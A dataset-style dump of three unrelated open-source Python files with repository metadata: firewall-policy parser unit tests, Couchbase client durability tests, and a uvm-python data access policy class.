[nacaddr.IPv4('10.1.1.0/24')],
]
term = policy.Term([policy.VarType(5, 'FOO')])
addr_term = policy.Term([policy.VarType(5, 'FOO')])
saddr_term = policy.Term([policy.VarType(3, 'FOO')])
daddr_term = policy.Term([policy.VarType(4, 'FOO')])
self.assertNotIn(addr_term, term)
self.assertNotIn(saddr_term, term)
self.assertNotIn(daddr_term, term)
@mock.patch.object(policy, 'DEFINITIONS')
def testDestAddrNotInDestAddr(self, mock_naming):
mock_naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('192.168.1.1/32')],
[nacaddr.IPv4('10.1.1.0/24')],
]
term_one = policy.Term([policy.VarType(4, 'FOO')])
term_two = policy.Term([policy.VarType(4, 'FOO')])
self.assertNotIn(term_one, term_two)
def testSourcePortNotInSourcePort(self):
term_one = policy.Term([policy.VarType(6, (22, 22))])
term_two = policy.Term([policy.VarType(6, (23, 23))])
self.assertNotIn(term_one, term_two)
def testDestinationPortNotInDestinationPort(self):
term_one = policy.Term([policy.VarType(7, (22, 22))])
term_two = policy.Term([policy.VarType(7, (23, 23))])
self.assertNotIn(term_one, term_two)
def testSourcePrefixContains(self):
term_one = policy.Term([policy.VarType(19, 'foo')])
self.assertIn(term_one, term_one)
def testSourcePrefixNotInSourcePrefix(self):
term_one = policy.Term([policy.VarType(19, 'foo')])
term_two = policy.Term([policy.VarType(19, 'bar')])
self.assertNotIn(term_one, term_two)
def testDestinationPrefixContains(self):
term_one = policy.Term([policy.VarType(20, 'foo')])
self.assertIn(term_one, term_one)
def testDestinationPrefixNotInDestinationPrefix(self):
term_one = policy.Term([policy.VarType(20, 'foo')])
term_two = policy.Term([policy.VarType(20, 'bar')])
self.assertNotIn(term_one, term_two)
def testSourcePrefixExceptContains(self):
term_one = policy.Term([policy.VarType(50, 'foo')])
self.assertIn(term_one, term_one)
def testSourcePrefixExceptNotInSourcePrefixExcept(self):
term_one = policy.Term([policy.VarType(50, 'foo')])
term_two = policy.Term([policy.VarType(50, 'bar')])
self.assertNotIn(term_one, term_two)
def testDestinationPrefixExceptContains(self):
term_one = policy.Term([policy.VarType(51, 'foo')])
self.assertIn(term_one, term_one)
def testDestinationPrefixExceptNotInDestinationPrefixExcept(self):
term_one = policy.Term([policy.VarType(51, 'foo')])
term_two = policy.Term([policy.VarType(51, 'bar')])
self.assertNotIn(term_one, term_two)
def testSourceTagContains(self):
term_one = policy.Term([policy.VarType(44, 'foo')])
self.assertIn(term_one, term_one)
def testSourceTagNotInSourceTag(self):
term_one = policy.Term([policy.VarType(44, 'foo')])
term_two = policy.Term([policy.VarType(44, 'bar')])
self.assertNotIn(term_one, term_two)
def testForwardingClassContains(self):
term_one = policy.Term([policy.VarType(43, 'foo')])
term_two = policy.Term(
[policy.VarType(43, 'bar'), policy.VarType(43, 'foo')]
)
self.assertIn(term_one, term_one)
self.assertIn(term_one, term_two)
def testForwardingClassNotIn(self):
term_one = policy.Term([policy.VarType(43, 'foo')])
term_two = policy.Term([policy.VarType(43, 'bar')])
term_three = policy.Term([])
self.assertNotIn(term_one, term_two)
self.assertNotIn(term_three, term_one)
def testForwardingClassExceptContains(self):
term_one = policy.Term([policy.VarType(52, 'foo')])
self.assertIn(term_one, term_one)
def testForwardingClassExceptNotIn(self):
term_one = policy.Term([policy.VarType(52, 'foo')])
term_two = policy.Term([policy.VarType(52, 'bar')])
term_three = policy.Term([])
self.assertNotIn(term_one, term_two)
self.assertNotIn(term_three, term_one)
@mock.patch.object(policy, 'DEFINITIONS')
def testNextIPContained(self, mock_naming):
mock_naming.GetNetAddr.side_effect = [[nacaddr.IPv4('192.168.1.1/32')]]
term_one = policy.Term([policy.VarType(46, 'FOO')])
self.assertIn(term_one, term_one)
@mock.patch.object(policy, 'DEFINITIONS')
def testNextIPNotIn(self, mock_naming):
mock_naming.GetNetAddr.side_effect = [[nacaddr.IPv4('192.168.1.1/32')]]
term_one = policy.Term([policy.VarType(46, 'FOO')])
term_two = policy.Term([])
self.assertNotIn(term_two, term_one)
def testPortContains(self):
# Test 'contains' against port field and that it matches
# source/destination/port fields.
port_term = policy.Term([policy.VarType(32, (25, 25))])
sport_term = policy.Term([policy.VarType(6, (25, 25))])
dport_term = policy.Term([policy.VarType(7, (25, 25))])
self.assertIn(sport_term, port_term)
self.assertIn(dport_term, port_term)
self.assertIn(port_term, port_term)
alt_port_term = policy.Term([policy.VarType(32, (25, 30))])
sport_term = policy.Term([policy.VarType(6, (25, 30))])
dport_term = policy.Term([policy.VarType(7, (25, 30))])
self.assertNotIn(alt_port_term, port_term)
self.assertNotIn(sport_term, port_term)
self.assertNotIn(dport_term, port_term)
def testFragmentOffset(self):
fo_term = policy.Term([])
fo_term.AddObject(policy.VarType(17, '80'))
fo_range_term = policy.Term([])
fo_range_term.AddObject(policy.VarType(17, '60-90'))
fo_smaller_range_term = policy.Term([])
fo_smaller_range_term.AddObject(policy.VarType(17, '65-82'))
term = policy.Term([])
self.assertIn(fo_term, fo_term)
self.assertIn(fo_term, fo_range_term)
self.assertNotIn(fo_range_term, fo_term)
self.assertIn(fo_smaller_range_term, fo_range_term)
self.assertNotIn(fo_range_term, fo_smaller_range_term)
self.assertNotIn(term, fo_term)
def testTermTargetResources(self):
target_resources = [('p1', 'v1'), ('p2', 'v2')]
target_resource_2 = [('p3', 'v3')]
term_one = policy.Term(
[policy.VarType(policy.VarType.TARGET_RESOURCES, target_resources)]
)
term_one.AddObject(policy.VarType(59, target_resource_2))
self.assertIn(target_resources, term_one.target_resources)
self.assertIn(target_resource_2, term_one.target_resources)
def testParsePolicySingleTargetResources(self):
good_term_target_resources = """
term target-resource-term {
action:: deny
target-resources:: (proj1,vpc1)
}"""
pol = HEADER_HF_1 + good_term_target_resources
p = policy.ParsePolicy(pol, self.naming)
self.assertIsInstance(p, policy.Policy)
_, terms = p.filters[0]
self.assertIn('deny', terms[0].action)
self.assertIn(('proj1', 'vpc1'), terms[0].target_resources)
def testParsePolicyMultipleTargetResources(self):
good_term_target_resources = """
term target-resource-term {
action:: deny
target-resources:: (proj1,vpc1)
target-resources:: (proj2,vpc2)
target-resources:: (proj3,vpc3)
target-resources:: (proj4,vpc4)
}"""
pol = HEADER_HF_1 + good_term_target_resources
p = policy.ParsePolicy(pol, self.naming)
self.assertIsInstance(p, policy.Policy)
_, terms = p.filters[0]
self.assertIn('deny', terms[0].action)
expected_target_resources = [
('proj1', 'vpc1'),
('proj2', 'vpc2'),
('proj3', 'vpc3'),
('proj4', 'vpc4'),
]
self.assertListEqual(expected_target_resources, terms[0].target_resources)
def testParsePolicyMultipleCommaSepTargetResources(self):
good_term_target_resources = """
term target-resource-term {
action:: deny
target-resources:: (proj1,vpc1),(proj2,vpc2),(proj3,vpc3),(proj4,vpc4)
}"""
pol = HEADER_HF_1 + good_term_target_resources
p = policy.ParsePolicy(pol, self.naming)
self.assertIsInstance(p, policy.Policy)
_, terms = p.filters[0]
self.assertIn('deny', terms[0].action)
expected_target_resources = [
('proj1', 'vpc1'),
('proj2', 'vpc2'),
('proj3', 'vpc3'),
('proj4', 'vpc4'),
]
self.assertListEqual(expected_target_resources, terms[0].target_resources)
def testParsePolicyMultipleSpaceSepTargetResources(self):
good_term_target_resources = """
term target-resource-term {
action:: deny
target-resources:: (proj1,vpc1) (proj2,vpc2) (proj3,vpc3) (proj4,vpc4)
}"""
pol = HEADER_HF_1 + good_term_target_resources
p = policy.ParsePolicy(pol, self.naming)
self.assertIsInstance(p, policy.Policy)
_, terms = p.filters[0]
self.assertIn('deny', terms[0].action)
expected_target_resources = [
('proj1', 'vpc1'),
('proj2', 'vpc2'),
('proj3', 'vpc3'),
('proj4', 'vpc4'),
]
self.assertListEqual(expected_target_resources, terms[0].target_resources)
def testParsePolicyMultipleArrayCommaTargetResources(self):
good_term_target_resources = """
term target-resource-term {
action:: deny
target-resources:: [(proj1,vpc1),(proj2,vpc2),(proj3,vpc3),(proj4,vpc4)]
}"""
pol = HEADER_HF_1 + good_term_target_resources
p = policy.ParsePolicy(pol, self.naming)
self.assertIsInstance(p, policy.Policy)
_, terms = p.filters[0]
self.assertIn('deny', terms[0].action)
expected_target_resources = [
('proj1', 'vpc1'),
('proj2', 'vpc2'),
('proj3', 'vpc3'),
('proj4', 'vpc4'),
]
self.assertListEqual(expected_target_resources, terms[0].target_resources)
def testParsePolicyMultipleArraySpaceTargetResources(self):
good_term_target_resources = """
term target-resource-term {
action:: deny
target-resources:: [(proj1,vpc1) (proj2,vpc2) (proj3,vpc3) (proj4,vpc4)]
}"""
pol = HEADER_HF_1 + good_term_target_resources
p = policy.ParsePolicy(pol, self.naming)
self.assertIsInstance(p, policy.Policy)
_, terms = p.filters[0]
self.assertIn('deny', terms[0].action)
expected_target_resources = [
('proj1', 'vpc1'),
('proj2', 'vpc2'),
('proj3', 'vpc3'),
('proj4', 'vpc4'),
]
self.assertListEqual(expected_target_resources, terms[0].target_resources)
if __name__ == '__main__':
absltest.main()
|
c6a7c4957faf81805a20631a62743928e06ad448
|
7e1c4dd6a2cae0597b4f4e961063cf077acdfd4c
|
/couchbase/tests/durability_t.py
|
61ed4c43959f463b9ab28fcfbc8fd3e71c11065f
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
couchbase/couchbase-python-client
|
753fa434db910d175bf9ea53a5829a40ba36e938
|
c7d80434be3f917d6f25439a918aed30273f63f4
|
refs/heads/master
| 2023-08-29T14:04:13.532717
| 2023-08-24T22:53:30
| 2023-08-25T03:35:21
| 2,122,194
| 223
| 87
|
Apache-2.0
| 2023-05-30T16:05:59
| 2011-07-29T04:24:46
|
Python
|
UTF-8
|
Python
| false
| false
| 18,602
|
py
|
durability_t.py
|
# Copyright 2016-2023. Couchbase, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import timedelta
import pytest
import couchbase.subdocument as SD
from couchbase.durability import (ClientDurability,
DurabilityLevel,
PersistTo,
PersistToExtended,
ReplicateTo,
ServerDurability)
from couchbase.exceptions import DocumentNotFoundException, DurabilityImpossibleException
from couchbase.options import (InsertOptions,
MutateInOptions,
RemoveOptions,
ReplaceOptions,
UpsertOptions)
from tests.environments import CollectionType
from tests.environments.test_environment import TestEnvironment
from tests.test_features import EnvironmentFeatures
class DurabilityTestSuite:
TEST_MANIFEST = [
'test_client_durable_insert',
'test_client_durable_insert_fail',
'test_client_durable_mutate_in',
'test_client_durable_mutate_in_fail',
'test_client_durable_remove',
'test_client_durable_remove_fail',
'test_client_durable_replace',
'test_client_durable_replace_fail',
'test_client_durable_upsert',
'test_client_durable_upsert_fail',
'test_client_durable_upsert_single_node',
'test_client_persist_to_extended',
'test_server_durable_insert',
'test_server_durable_insert_single_node',
'test_server_durable_mutate_in',
'test_server_durable_mutate_in_single_node',
'test_server_durable_remove',
'test_server_durable_remove_single_node',
'test_server_durable_replace',
'test_server_durable_replace_single_node',
'test_server_durable_upsert',
'test_server_durable_upsert_single_node',
]
@pytest.fixture(scope='class')
def check_has_replicas(self, num_replicas):
if num_replicas == 0:
pytest.skip('No replicas to test durability.')
@pytest.fixture(scope='class')
def check_multi_node(self, num_nodes):
if num_nodes == 1:
pytest.skip('Test only for clusters with more than a single node.')
@pytest.fixture(scope='class')
def check_single_node(self, num_nodes):
if num_nodes != 1:
pytest.skip('Test only for clusters with a single node.')
@pytest.fixture(scope='class')
def check_sync_durability_supported(self, cb_env):
EnvironmentFeatures.check_if_feature_supported('sync_durability',
cb_env.server_version_short,
cb_env.mock_server_type)
@pytest.fixture(scope='class')
def num_replicas(self, cb_env):
bucket_settings = TestEnvironment.try_n_times(10, 1, cb_env.bm.get_bucket, cb_env.bucket.name)
num_replicas = bucket_settings.get("num_replicas")
return num_replicas
@pytest.fixture(scope='class')
def num_nodes(self, cb_env):
return len(cb_env.cluster._cluster_info.nodes)
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_insert(self, cb_env, num_replicas):
key, value = cb_env.get_new_doc()
durability = ClientDurability(
persist_to=PersistTo.ONE, replicate_to=ReplicateTo(num_replicas))
cb_env.collection.insert(key, value, InsertOptions(durability=durability))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_insert_fail(self, cb_env, num_replicas):
if num_replicas > 2:
pytest.skip('Too many replicas enabled.')
key, value = cb_env.get_new_doc()
durability = ClientDurability(
persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.insert(key, value, InsertOptions(durability=durability))
# @TODO: why DurabilityImpossibleException not raised?
# @pytest.mark.usefixtures('check_multi_node')
# @pytest.mark.usefixtures('check_has_replicas')
# def test_client_durable_insert_single_node(self, cb_env, num_replicas):
# key, value = cb_env.get_new_doc()
# durability = ClientDurability(
# persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
# with pytest.raises(DurabilityImpossibleException):
# cb_env.collection.insert(key, value, InsertOptions(durability=durability))
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_mutate_in(self, cb_env, num_replicas):
key, value = cb_env.get_existing_doc()
value['make'] = 'New Make'
value['model'] = 'New Model'
durability = ClientDurability(
persist_to=PersistTo.ONE, replicate_to=ReplicateTo(num_replicas))
cb_env.collection.mutate_in(key,
(SD.upsert('make', 'New Make'), SD.replace('model', 'New Model')),
MutateInOptions(durability=durability))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_mutate_in_fail(self, cb_env, num_replicas):
if num_replicas > 2:
pytest.skip('Too many replicas enabled.')
key = cb_env.get_existing_doc(key_only=True)
durability = ClientDurability(
persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.mutate_in(key, (SD.upsert('make', 'New Make'),), MutateInOptions(durability=durability))
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_remove(self, cb_env, num_replicas):
key = cb_env.get_existing_doc(key_only=True)
durability = ClientDurability(persist_to=PersistTo.ONE, replicate_to=ReplicateTo(num_replicas))
cb_env.collection.remove(key, RemoveOptions(durability=durability))
with pytest.raises(DocumentNotFoundException):
cb_env.collection.get(key)
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_remove_fail(self, cb_env, num_replicas):
if num_replicas > 2:
pytest.skip("Too many replicas enabled.")
key = cb_env.get_existing_doc(key_only=True)
durability = ClientDurability(
persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.remove(key, RemoveOptions(durability=durability))
# @TODO: why DurabilityImpossibleException not raised?
# @pytest.mark.usefixtures('check_multi_node')
# @pytest.mark.usefixtures('check_has_replicas')
# def test_client_durable_remove_single_node(self, cb_env, num_replicas):
# key = cb_env.get_existing_doc(key_only=True)
# durability = ClientDurability(
# persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
# with pytest.raises(DurabilityImpossibleException):
# cb_env.collection.remove(key, RemoveOptions(durability=durability))
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_replace(self, cb_env, num_replicas):
key, value = cb_env.get_existing_doc()
durability = ClientDurability(
persist_to=PersistTo.ONE, replicate_to=ReplicateTo(num_replicas))
cb_env.collection.replace(key, value, ReplaceOptions(durability=durability))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_replace_fail(self, cb_env, num_replicas):
if num_replicas > 2:
pytest.skip("Too many replicas enabled.")
key, value = cb_env.get_existing_doc()
durability = ClientDurability(
persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.replace(key, value, ReplaceOptions(durability=durability))
# @TODO: why DurabilityImpossibleException not raised?
# @pytest.mark.usefixtures('check_multi_node')
# @pytest.mark.usefixtures('check_has_replicas')
# def test_client_durable_replace_single_node(self, cb_env, num_replicas):
# key, value = cb_env.get_existing_doc()
# durability = ClientDurability(
# persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
# with pytest.raises(DurabilityImpossibleException):
# cb_env.collection.replace(key, value, ReplaceOptions(durability=durability))
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_upsert(self, cb_env, num_replicas):
key, value = cb_env.get_existing_doc()
durability = ClientDurability(
persist_to=PersistTo.ONE, replicate_to=ReplicateTo(num_replicas))
cb_env.collection.upsert(key, value,
UpsertOptions(durability=durability), timeout=timedelta(seconds=3))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_upsert_fail(self, cb_env, num_replicas):
if num_replicas > 2:
pytest.skip("Too many replicas enabled.")
key, value = cb_env.get_existing_doc()
durability = ClientDurability(
persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.upsert(key, value, UpsertOptions(durability=durability))
@pytest.mark.usefixtures('check_single_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_upsert_single_node(self, cb_env, num_replicas):
key, value = cb_env.get_existing_doc()
durability = ClientDurability(
persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.upsert(key, value, UpsertOptions(durability=durability))
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
@pytest.mark.parametrize('persist_to', [PersistToExtended.NONE, PersistToExtended.ACTIVE, PersistToExtended.ONE])
def test_client_persist_to_extended(self, cb_env, persist_to):
key, value = cb_env.get_existing_doc()
durability = ClientDurability(
persist_to=persist_to, replicate_to=ReplicateTo.ONE)
cb_env.collection.upsert(key, value, UpsertOptions(durability=durability))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_insert(self, cb_env):
key, value = cb_env.get_new_doc()
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
cb_env.collection.insert(key, value, InsertOptions(durability=durability))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_single_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_insert_single_node(self, cb_env):
key, value = cb_env.get_new_doc()
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.insert(key, value, InsertOptions(durability=durability))
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_mutate_in(self, cb_env):
key, value = cb_env.get_existing_doc()
value['make'] = 'New Make'
value['model'] = 'New Model'
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
cb_env.collection.mutate_in(key,
(SD.upsert('make', 'New Make'), SD.replace('model', 'New Model')),
MutateInOptions(durability=durability))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_single_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_mutate_in_single_node(self, cb_env):
key = cb_env.get_existing_doc(key_only=True)
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.mutate_in(key, (SD.upsert('make', 'New Make'),), MutateInOptions(durability=durability))
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_remove(self, cb_env):
key = cb_env.get_existing_doc(key_only=True)
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
cb_env.collection.remove(key, RemoveOptions(durability=durability))
with pytest.raises(DocumentNotFoundException):
cb_env.collection.get(key)
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_single_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_remove_single_node(self, cb_env):
key = cb_env.get_existing_doc(key_only=True)
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.remove(key, RemoveOptions(durability=durability))
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_replace(self, cb_env):
key, value = cb_env.get_existing_doc()
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
cb_env.collection.replace(key, value, ReplaceOptions(durability=durability))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_single_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_replace_single_node(self, cb_env):
key, value = cb_env.get_existing_doc()
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.replace(key, value, ReplaceOptions(durability=durability))
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_upsert(self, cb_env):
key, value = cb_env.get_existing_doc()
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
cb_env.collection.upsert(key, value, UpsertOptions(durability=durability))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_single_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_upsert_single_node(self, cb_env):
key, value = cb_env.get_existing_doc()
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.upsert(key, value, UpsertOptions(durability=durability))
class ClassicDurabilityTests(DurabilityTestSuite):
@pytest.fixture(scope='class')
def test_manifest_validated(self):
def valid_test_method(meth):
attr = getattr(ClassicDurabilityTests, meth)
return callable(attr) and not meth.startswith('__') and meth.startswith('test')
method_list = [meth for meth in dir(ClassicDurabilityTests) if valid_test_method(meth)]
compare = set(DurabilityTestSuite.TEST_MANIFEST).difference(method_list)
return compare
@pytest.fixture(scope='class', name='cb_env', params=[CollectionType.DEFAULT, CollectionType.NAMED])
def couchbase_test_environment(self, cb_base_env, test_manifest_validated, request):
if test_manifest_validated:
pytest.fail(f'Test manifest not validated. Missing tests: {test_manifest_validated}.')
cb_base_env.enable_bucket_mgmt()
cb_base_env.setup(request.param)
yield cb_base_env
cb_base_env.teardown(request.param)
|
8a9ef1646b4d68498b2f2d381cdd5795c07777d7
|
ee303308d85c28467a7dfe5300951d49a3866fb3
|
/src/uvm/dap/uvm_set_before_get_dap.py
|
9e2b607a76e960ab81aa4880c7f87d8d28dbcd0c
|
[
"Apache-2.0"
] |
permissive
|
tpoikela/uvm-python
|
3a66a43100a2903f91e0bb73b84c07c1003f7763
|
fc5f955701b2b56c1fddac195c70cb3ebb9139fe
|
refs/heads/master
| 2023-05-02T05:08:00.792132
| 2023-04-24T16:07:14
| 2023-04-24T16:07:14
| 232,838,902
| 199
| 43
|
Apache-2.0
| 2023-04-24T16:10:44
| 2020-01-09T15:22:26
|
Python
|
UTF-8
|
Python
| false
| false
| 7,255
|
py
|
uvm_set_before_get_dap.py
|
#//
#//----------------------------------------------------------------------------
#// Copyright 2007-2011 Mentor Graphics Corporation
#// Copyright 2007-2011 Cadence Design Systems, Inc.
#// Copyright 2010-2011 Synopsys, Inc.
#// Copyright 2013 NVIDIA Corporation
#// Copyright 2019 Tuomas Poikela (tpoikela)
#// All Rights Reserved Worldwide
#//
#// Licensed under the Apache License, Version 2.0 (the
#// "License"); you may not use this file except in
#// compliance with the License. You may obtain a copy of
#// the License at
#//
#// http://www.apache.org/licenses/LICENSE-2.0
#//
#// Unless required by applicable law or agreed to in
#// writing, software distributed under the License is
#// distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
#// CONDITIONS OF ANY KIND, either express or implied. See
#// the License for the specific language governing
#// permissions and limitations under the License.
#//----------------------------------------------------------------------------
#
from .uvm_set_get_dap_base import uvm_set_get_dap_base
from ..macros.uvm_object_defines import uvm_object_utils
from ..macros.uvm_message_defines import *
from ..base.sv import sv
from ..base.uvm_globals import uvm_check_output_args
ERR_MSG1 = "Attempt to get value on '%s', but the data access policy forbits calling 'get' prior to calling 'set' or 'try_set'!"
#// Class: uvm_set_before_get_dap
#// Provides a 'Set Before Get' Data Access Policy.
#//
#// The 'Set Before Get' Data Access Policy enforces that the value must
#// be written at ~least~ once before it is read. This DAP can be used to
#// pass shared information to multiple components during standard configuration,
#// even if that information hasn't yet been determined.
#//
#// Such DAP objects can be useful for passing a 'placeholder' reference, before
#// the information is actually available. A good example of this would be
#// the virtual sequencer:
#//
#//| typedef uvm_set_before_get_dap#(uvm_sequencer_base) seqr_dap_t;
#//| virtual_seqeuncer_type virtual_sequencer;
#//| agent_type my_agent;
#//| seqr_dap_t seqr_dap;
#//|
#//| function void my_env::build_phase(uvm_phase phase);
#//| seqr_dap = seqr_dap_t::type_id::create("seqr_dap");
#//| // Pass the DAP, because we don't have a reference to the
#//| // real sequencer yet...
#//| uvm_config_db#(seqr_dap_t)::set(this, "virtual_sequencer", "seqr_dap", seqr_dap);
#//|
#//| // Create the virtual sequencer
#//| virtual_sequencer = virtual_sequencer_type::type_id::create("virtual_sequencer", this);
#//|
#//| // Create the agent
#//| agent = agent_type::type_id::create("agent", this);
#//| endfunction
#//|
#//| function void my_env::connect_phase(uvm_phase phase);
#//| // Now that we know the value is good, we can set it
#//| seqr_dap.set(agent.sequencer);
#//| endfunction
#//
#// In the example above, the environment didn't have a reference to the
#// agent's sequencer yet, because the agent hadn't executed its ~build_phase~.
#// The environment needed to give the virtual sequencer a "Set before get" DAP
#// so that the virtual sequencer (and any sequences one it), could ~eventually~
#// see the agent's sequencer, when the reference was finally available. If
#// the virtual sequencer (or any sequences on it) attempted to 'get' the
#// reference to the agent's sequencer ~prior~ to the environment assigning it,
#// an error would have been reported.
#
#class uvm_set_before_get_dap#(type T=int) extends uvm_set_get_dap_base#(T);
class uvm_set_before_get_dap(uvm_set_get_dap_base):
#
# // Used for self-references
# typedef uvm_set_before_get_dap#(T) this_type;
#
# // Function: new
# // Constructor
def __init__(self, name="unnamed-uvm_set_before_get_dap#(T)"):
uvm_set_get_dap_base.__init__(self, name)
self.m_set = False
self.m_value = None
# // Group: Set/Get Interface
#
# // Function: set
# // Updates the value stored within the DAP.
# //
def set(self, value):
self.m_set = True
self.m_value = value
# // Function: try_set
# // Attempts to update the value stored within the DAP.
# //
# // ~try_set~ will always return a 1.
# virtual function bit try_set(T value);
# set(value);
# return 1;
# endfunction : try_set
#
# // Function: get
# // Returns the current value stored within the DAP.
# //
# // If 'get' is called before a call to <set> or <try_set>, then
# // an error will be reported.
def get(self):
if self.m_set is False:
uvm_error("UVM/SET_BEFORE_GET_DAP/NO_SET", sv.sformatf(ERR_MSG1, self.get_full_name()))
return self.m_value
#
# // Function: try_get
# // Attempts to retrieve the current value stored within the DAP
# //
# // If the value has not been 'set', then try_get will return a 0,
# // otherwise it will return a 1, and set ~value~ to the current
# // value stored within the DAP.
def try_get(self, value):
uvm_check_output_args([value])
if self.m_set is False:
return 0
else:
value.append(self.m_value)
return 1
#
# // Group: Introspection
# //
# // The ~uvm_set_before_get_dap~ cannot support the standard UVM
# // instrumentation methods (~copy~, ~clone~, ~pack~ and
# // ~unpack~), due to the fact that they would potentially
# // violate the access policy.
# //
# // A call to any of these methods will result in an error.
#
# virtual function void do_copy(uvm_object rhs);
# `uvm_error("UVM/SET_BEFORE_GET_DAP/CPY",
# "'copy()' is not supported for 'uvm_set_before_get_dap#(T)'")
# endfunction : do_copy
#
# virtual function void do_pack(uvm_packer packer);
# `uvm_error("UVM/SET_BEFORE_GET_DAP/PCK",
# "'pack()' is not supported for 'uvm_set_before_get_dap#(T)'")
# endfunction : do_pack
#
# virtual function void do_unpack(uvm_packer packer);
# `uvm_error("UVM/SET_BEFORE_GET_DAP/UPK",
# "'unpack()' is not supported for 'uvm_set_before_get_dap#(T)'")
# endfunction : do_unpack
#
# // Group- Reporting
#
# // Function- convert2string
# virtual function string convert2string();
# if (m_set)
# return $sformatf("(%s) %0p [SET]", `uvm_typename(m_value), m_value);
# else
# return $sformatf("(%s) %0p [UNSET]", `uvm_typename(m_value), m_value);
# endfunction : convert2string
#
# // Function- do_print
# virtual function void do_print(uvm_printer printer);
# super.do_print(printer);
